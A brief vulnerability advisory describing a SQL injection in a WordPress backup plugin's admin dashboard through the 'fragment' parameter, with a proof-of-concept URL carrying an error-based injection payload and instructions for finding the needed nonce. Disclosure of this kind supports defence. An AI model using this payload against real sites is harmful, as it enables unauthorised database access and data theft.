The plugin does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to a SQL injection issue
https://example.com/wp-admin/?fragment=select updatexml(1,concat(0x7e,(select user())),0)::2.txt&_wpnonce=7347278aca The nonce can be retrieved from the “Backup Now” and “Scheduled Backup” tabs of the plugin (/wp-admin/tools.php?page=wp-db-backup), look for action=save_backup_time&_wpnonce= in the source